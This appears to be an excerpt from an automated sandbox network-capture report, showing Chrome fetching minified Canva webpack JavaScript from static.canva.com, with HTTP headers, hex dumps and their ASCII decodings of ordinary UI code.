                                                                                                                                                                                                                                                                    Data Ascii: g.end())};z8a=function(a,b,c,d){const e=a.uH(c);[...a.HS].filter(e).forEach(f=>b[f].add(d[f]));Ep(a,d,f=>a.Qea(f)&&e(f),(f,g)=>b[g].add(f))};A8a=function(a,b,c,d){const e=a.uh,f=a.uH(c);var g;[...a.HS].filter(f).forEach(h=>b[h].add(null!==(g=d[h])&&void
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 63 29 7b 62 3d 64 41 2e 74 72 61 6e 73 6c 61 74 65 28 2d 62 2e 78 2c 2d 62 2e 79 29 2e 74 68 65 6e 28 66 41 28 2d 61 2e 72 6f 74 61 74 69 6f 6e 2a 72 41 2f 31 38 30 29 29 3b 76 61 72 20 64 3d 61 2e 62 72 3b 63 6f 6e 73 74 20 5b 65 2c 66 5d 3d 5b 62 2e 74 72 61 6e 73 66 6f 72 6d 50 6f 69 6e 74 28 61 2e 74 6c 29 2c 62 2e 74 72 61 6e 73 66 6f 72 6d 50 6f 69 6e 74 28 64 29 5d 3b 61 3d 4c 4b 28 65 2e 78 29 3b 64 3d 4c 4b 28 65 2e 79 29 3b 63 6f 6e 73 74 20 67 3d 4c 4b 28 66 2e 78 29 2c 68 3d 4c 4b 28 66 2e 79 29 3b 74 28 30 3e 3d 61 2c 22 73 63 61 6c 65 20 6f 72 69 67 69 6e 20 69 73 20 6f 75 74 73 69 64 65 20 62 6f 78 3a 20 7b 7d 22 2c 61 29 3b 74 28 30 3e 3d 64 2c 22 73 63 61 6c 65 20 6f 72 69 67 69 6e 20 69 73 20 6f 75 74 73 69 64 65 20 62 6f 78 3a 20 7b 7d
                                                                                                                                                                                                                                                                    Data Ascii: c){b=dA.translate(-b.x,-b.y).then(fA(-a.rotation*rA/180));var d=a.br;const [e,f]=[b.transformPoint(a.tl),b.transformPoint(d)];a=LK(e.x);d=LK(e.y);const g=LK(f.x),h=LK(f.y);t(0>=a,"scale origin is outside box: {}",a);t(0>=d,"scale origin is outside box: {}


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    57192.168.2.1249782104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC615OUTGET /web/570ea329b63c4775.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:41 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 7317
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e595114ae238cc5-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49981
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "cf52a438fe0a9d28119b078611a24bcb"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:27 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:17 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: 8knn/YBP/NinW9bR+vYms+kFtBtgDXuanYnJW47IpZD4TWPwnwyDlVXLMUsVBBVzJwZcirEdu0E=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8HA0QAFHCKE0NC
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 1jlfdIl.Zg6YF9wUvqxsC6CLMdlzNph_
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 51 67 65 36 36 55 33 69 5a 65 73 52 58 45 6e 69 51 4a 78 48 51 48 25 32 42 42 79 6c 58 46 79 4b 75 4f 57 49 66 6d 53 4f 75 53 78 32 75 74 25 32 42 6c 7a 5a 68 5a 71 44 46 79 55 58 4d 61 36 54 72 77 77 32 68 65 6f 30 46 6c 69 77 4f 6e 48 52 52 25 32 42 6b 36 49 63 25 32 46 6c 67 50 65 77 7a 6b 51 54 70 58 6c 37 4c 49 53 6b 48 77 33 76 6b 37 57 77 73 59 69 78 54 62 6e 6f 63 57 69 6a 55 58 4e 47 34 6a 75 72 77 49 34 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qge66U3iZesRXEniQJxHQH%2BBylXFyKuOWIfmSOuSx2ut%2BlzZhZqDFyUXMa6Trww2heo0FliwOnHRR%2Bk6Ic%2FlgPewzkQTpXl7LISkHw3vk7WwsYixTbnocWijUXNG4jurwI4%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1197INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 32 32 31 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 31 32 31 34 34 36 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 34
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[4221],{/***/ 121446:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._4
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 65 28 64 29 29 3b 72 65 74 75 72 6e 20 62 7d 3b 0a 51 70 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 52 70 61 28 61 2e 63 6f 64 65 50 6f 69 6e 74 41 74 28 62 29 29 3b 63 6f 6e 73 74 20 64 3d 5b 5d 3b 66 6f 72 28 62 2b 3d 31 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 7b 76 61 72 20 65 3d 61 2c 66 3d 62 2d 31 3b 69 66 28 21 28 35 35 32 39 36 3c 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 66 29 26 26 35 36 33 31 39 3e 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 66 29 26 26 35 36 33 32 30 3c 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 66 2b 31 29 26 26 35 37 33 34 33 3e 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 66 2b 31 29 29 29 7b 65 3d 52 70 61 28 61 2e 63 6f 64 65 50 6f 69 6e 74 41 74 28 62 29 29 3b 69 66 28 32 3d 3d 3d 63 26 26 33 3d
                                                                                                                                                                                                                                                                    Data Ascii: e(d));return b};Qpa=function(a,b){var c=Rpa(a.codePointAt(b));const d=[];for(b+=1;b<a.length;b++){var e=a,f=b-1;if(!(55296<=e.charCodeAt(f)&&56319>=e.charCodeAt(f)&&56320<=e.charCodeAt(f+1)&&57343>=e.charCodeAt(f+1))){e=Rpa(a.codePointAt(b));if(2===c&&3=
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 21 63 26 26 69 69 28 22 63 6c 69 70 50 61 74 68 22 2c 7b 69 64 3a 65 2c 63 68 69 6c 64 72 65 6e 3a 69 69 28 22 72 65 63 74 22 2c 7b 72 65 66 3a 66 7d 29 7d 29 2c 69 69 28 22 67 22 2c 7b 63 6c 69 70 50 61 74 68 3a 63 3f 76 6f 69 64 20 30 3a 60 75 72 6c 28 23 24 7b 65 7d 29 60 2c 63 68 69 6c 64 72 65 6e 3a 64 7d 29 5d 7d 29 7d 3b 62 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 6e 75 6c 6c 21 3d 61 2e 6e 61 6d 65 3f 60 43 6c 69 70 70 69 6e 67 43 6f 6e 74 61 69 6e 65 72 28 24 7b 61 2e 6e 61 6d 65 7d 29 60 3a 0a 22 43 6c 69 70 70 69 6e 67 43 6f 6e 74 61 69 6e 65 72 22 3b 72 65 74 75 72 6e 20 62 7d 3b 5f 5f 63 2e 4e 70 61 3d 7b 64 61 74 65 3a 7b 77 65 65 6b 64 61 79 3a 7b 77 65 65 6b 64 61 79 3a 22 6c 6f 6e 67 22 7d 2c 6d 65 64 69
                                                                                                                                                                                                                                                                    Data Ascii: ,{children:[!c&&ii("clipPath",{id:e,children:ii("rect",{ref:f})}),ii("g",{clipPath:c?void 0:`url(#${e})`,children:d})]})};b.displayName=null!=a.name?`ClippingContainer(${a.name})`:"ClippingContainer";return b};__c.Npa={date:{weekday:{weekday:"long"},medi
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 74 68 69 73 2e 77 69 6e 64 6f 77 2e 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 7d 64 70 70 78 29 60 29 2c 74 68 69 73 2e 6d 61 74 63 68 2e 61 64 64 4c 69 73 74 65 6e 65 72 28 74 68 69 73 2e 51 35 29 29 7d 51 6a 61 28 29 7b 74 68 69 73 2e 6d 61 74 63 68 26 26 28 74 68 69 73 2e 6d 61 74 63 68 2e 72 65 6d 6f 76 65 4c 69 73 74 65 6e 65 72 28 74 68 69 73 2e 51 35 29 2c 74 68 69 73 2e 6d 61 74 63 68 3d 76 6f 69 64 20 30 29 7d 67 65 74 20 76 61 6c 75 65 28 29 7b 76 61 72 20 61 3b 74 68 69 73 5b 6d 69 5d 2e 72 65 70 6f 72 74 4f 62 73 65 72 76 65 64 28 29 3b 76 61 72 20 62 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 28 62 3d 6e 75 6c 6c 3d 3d 3d 28 61 3d 74 68 69 73 2e 77 69 6e 64 6f 77 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 64
                                                                                                                                                                                                                                                                    Data Ascii: this.window.devicePixelRatio}dppx)`),this.match.addListener(this.Q5))}Qja(){this.match&&(this.match.removeListener(this.Q5),this.match=void 0)}get value(){var a;this[mi].reportObserved();var b;return null!==(b=null===(a=this.window)||void 0===a?void 0:a.d
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 36 39 32 39 32 2c 31 32 31 34 36 31 2c 31 32 31 34 37 36 2c 31 32 32 39 31 35 2c 31 32 32 39 31 36 5d 29 2c 5a 70 61 3d 5b 5b 37 36 38 2c 38 37 39 5d 2c 5b 31 31 35 35 2c 31 31 36 31 5d 2c 5b 31 34 32 35 2c 31 34 36 39 5d 2c 5b 31 35 35 32 2c 31 35 36 32 5d 2c 5b 31 36 31 31 2c 31 36 33 31 5d 2c 5b 31 37 35 30 2c 31 37 35 36 5d 2c 5b 31 37 35 39 2c 31 37 36 34 5d 2c 5b 31 37 37 30 2c 31 37 37 33 5d 2c 5b 32 32 35 39 2c 32 32 37 33 5d 2c 5b 32 32 37 35 2c 32 33 30 36 5d 2c 5b 32 33 36 39 2c 32 33 37 36 5d 2c 5b 32 33 38 35 2c 32 33 39 31 5d 2c 5b 32 34 39 37 2c 32 35 30 30 5d 2c 0a 5b 32 36 33 35 2c 32 36 33 37 5d 2c 5b 32 37 35 33 2c 32 37 35 37 5d 2c 5b 32 38 31 30 2c 32 38 31 35 5d 2c 5b 33 31 33 34 2c 33 31 33 36 5d 2c 5b 33 31 34 32 2c 33 31 34 34 5d
                                                                                                                                                                                                                                                                    Data Ascii: 69292,121461,121476,122915,122916]),Zpa=[[768,879],[1155,1161],[1425,1469],[1552,1562],[1611,1631],[1750,1756],[1759,1764],[1770,1773],[2259,2273],[2275,2306],[2369,2376],[2385,2391],[2497,2500],[2635,2637],[2753,2757],[2810,2815],[3134,3136],[3142,3144]
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC644INData Raw: 70 28 60 5b 24 7b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 5f 5f 63 2e 71 69 29 2e 6a 6f 69 6e 28 22 22 29 7d 5d 60 2c 22 67 22 29 3b 5f 5f 63 2e 71 71 61 3d 7b 2e 2e 2e 5f 5f 63 2e 71 69 2c 27 22 27 3a 22 26 71 75 6f 74 3b 22 2c 22 27 22 3a 22 26 23 78 32 37 3b 22 7d 3b 5f 5f 63 2e 72 71 61 3d 6e 65 77 20 52 65 67 45 78 70 28 60 5b 24 7b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 5f 5f 63 2e 71 71 61 29 2e 6a 6f 69 6e 28 22 22 29 7d 5d 60 2c 22 67 22 29 3b 76 61 72 20 64 71 61 3d 63 6c 61 73 73 7b 67 65 74 20 70 72 65 66 65 72 73 52 65 64 75 63 65 64 4d 6f 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 68 69 73 2e 73 67 61 26 26 74 68 69 73 2e 73 67 61 2e 6d 61 74 63 68 65 73 7d 61 64 64 4c 69 73 74 65 6e 65 72 28 61 29 7b 76 61 72 20 62 3b 6e 75 6c
                                                                                                                                                                                                                                                                    Data Ascii: p(`[${Object.keys(__c.qi).join("")}]`,"g");__c.qqa={...__c.qi,'"':"&quot;","'":"&#x27;"};__c.rqa=new RegExp(`[${Object.keys(__c.qqa).join("")}]`,"g");var dqa=class{get prefersReducedMotion(){return null!=this.sga&&this.sga.matches}addListener(a){var b;nul


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    58192.168.2.1249779104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC787OUTGET /web/e5f78acafec3a6c5.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:41 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 12870
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e595114adec42cf-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49981
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "20e9ff75aa3527cfd46175deaf4d946c"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:27 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:23 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: XHqQVxSrcNDiOb2C4WxzRG7xnF/hENxVEFNsR6JvrBFWfbkXlWOxeFVXQElzRaFX36QAB82tCRI=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8RGEEV0S6DVTQ9
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: sneblVlWanPyHNVn8bPKBaE74YPSj_9U
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC354INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 25 32 42 36 4e 31 48 36 32 4d 6f 56 33 6a 45 25 32 42 6b 4a 52 44 4c 52 68 55 41 25 32 46 39 7a 50 37 4a 25 32 42 6a 45 6f 4a 4a 73 67 66 43 58 6a 4b 65 32 74 51 42 48 41 37 57 34 41 44 63 54 32 31 39 31 35 64 25 32 46 4c 77 50 38 4d 32 34 47 59 51 4c 63 52 66 4d 45 6b 4a 34 6a 43 77 31 37 45 56 55 6c 4e 6f 65 46 53 54 63 56 78 53 68 4c 68 56 69 68 4d 57 4d 61 6a 4e 4a 4a 6b 45 62 4c 71 68 38 70 77 79 44 44 52 71 75 6b 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B6N1H62MoV3jE%2BkJRDLRhUA%2F9zP7J%2BjEoJJsgfCXjKe2tQBHA7W4ADcT21915d%2FLwP8M24GYQLcRfMEkJ4jCw17EVUlNoeFSTcVxShLhVihMWMajNJJkEbLqh8pwyDDRquk%3D"}],"group":"cf-nel","max_age":60
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1194INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 30 36 39 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 31 33 39 35 30 34 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[5069],{/***/ 139504:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_r
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 42 28 61 29 3b 7d 7d 3b 0a 48 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 24 69 2e 6d 61 70 28 46 72 61 28 61 29 2c 63 3d 3e 63 3f 22 6c 69 22 3d 3d 3d 62 26 26 61 6a 28 63 29 26 26 22 6c 69 22 3d 3d 3d 63 2e 74 79 70 65 3f 47 72 61 28 63 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 62 6a 28 63 2e 70 72 6f 70 73 2e 63 6c 61 73 73 4e 61 6d 65 2c 22 65 41 55 69 48 41 22 29 7d 29 3a 64 6a 28 62 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 65 41 55 69 48 41 22 2c 63 68 69 6c 64 72 65 6e 3a 63 7d 29 3a 6e 75 6c 6c 29 7d 3b 0a 46 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 3d 30 2c 63 3d 5b 5d 29 7b 61 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 3f 61 2e 6d 61 70 28 64 3d 3e 7b 76 61 72 20 65 3b 72 65
                                                                                                                                                                                                                                                                    Data Ascii: lt:throw new B(a);}};Hra=function(a,b){return $i.map(Fra(a),c=>c?"li"===b&&aj(c)&&"li"===c.type?Gra(c,{className:bj(c.props.className,"eAUiHA")}):dj(b,{className:"eAUiHA",children:c}):null)};Fra=function(a,b=0,c=[]){a=Array.isArray(a)?a.map(d=>{var e;re
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 22 2c 63 65 6e 74 65 72 4a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 4d 59 62 36 30 41 22 2c 73 74 61 72 74 4a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 54 6a 62 4d 42 67 22 2c 73 74 61 72 74 46 6c 65 78 4a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 5f 57 49 79 56 51 22 2c 65 6e 64 4a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 51 38 5f 7a 39 51 22 2c 65 6e 64 46 6c 65 78 4a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 59 67 48 44 6e 67 22 2c 73 70 61 63 65 42 65 74 77 65 65 6e 4a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 5f 31 6c 56 73 69 41 22 2c 73 74 72 65 74 63 68 41 6c 69 67 6e 49 74 65 6d 73 3a 22 58 4a 4b 70 48 67 22 2c 63 65 6e 74 65 72 41 6c 69 67 6e 49 74 65 6d 73 3a 22 46 51 36 34 67 67 22 2c 73 74 61 72 74 41 6c 69 67 6e 49 74 65
                                                                                                                                                                                                                                                                    Data Ascii: ",centerJustifyContent:"MYb60A",startJustifyContent:"TjbMBg",startFlexJustifyContent:"_WIyVQ",endJustifyContent:"Q8_z9Q",endFlexJustifyContent:"YgHDng",spaceBetweenJustifyContent:"_1lVsiA",stretchAlignItems:"XJKpHg",centerAlignItems:"FQ64gg",startAlignIte
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 72 69 6d 61 72 79 3a 22 76 61 72 28 2d 2d 56 4e 58 70 53 77 29 22 2c 63 6f 6c 6f 72 57 61 72 6e 3a 22 76 61 72 28 2d 2d 32 33 5a 4f 56 51 29 22 2c 63 6f 6c 6f 72 57 61 72 6e 46 6f 72 65 3a 22 76 61 72 28 2d 2d 35 75 45 53 4d 67 29 22 2c 63 6f 6c 6f 72 57 61 72 6e 46 6f 72 65 4c 6f 77 3a 22 76 61 72 28 2d 2d 4f 51 32 67 70 41 29 22 2c 63 6f 6c 6f 72 57 61 72 6e 4c 6f 77 3a 22 76 61 72 28 2d 2d 79 64 5a 55 53 41 29 22 2c 63 61 6e 76 61 73 42 61 63 6b 67 72 6f 75 6e 64 3a 22 69 31 4b 77 7a 67 22 2c 0a 74 61 62 64 6f 63 6b 42 61 63 6b 67 72 6f 75 6e 64 3a 22 7a 50 50 4c 36 67 22 2c 70 61 67 65 42 61 63 6b 67 72 6f 75 6e 64 3a 22 4c 67 55 72 31 51 22 2c 73 75 72 66 61 63 65 42 61 63 6b 67 72 6f 75 6e 64 3a 22 45 53 47 63 56 77 22 2c 63 6f 6e 74 72 61 73 74 42
                                                                                                                                                                                                                                                                    Data Ascii: rimary:"var(--VNXpSw)",colorWarn:"var(--23ZOVQ)",colorWarnFore:"var(--5uESMg)",colorWarnForeLow:"var(--OQ2gpA)",colorWarnLow:"var(--ydZUSA)",canvasBackground:"i1Kwzg",tabdockBackground:"zPPL6g",pageBackground:"LgUr1Q",surfaceBackground:"ESGcVw",contrastB
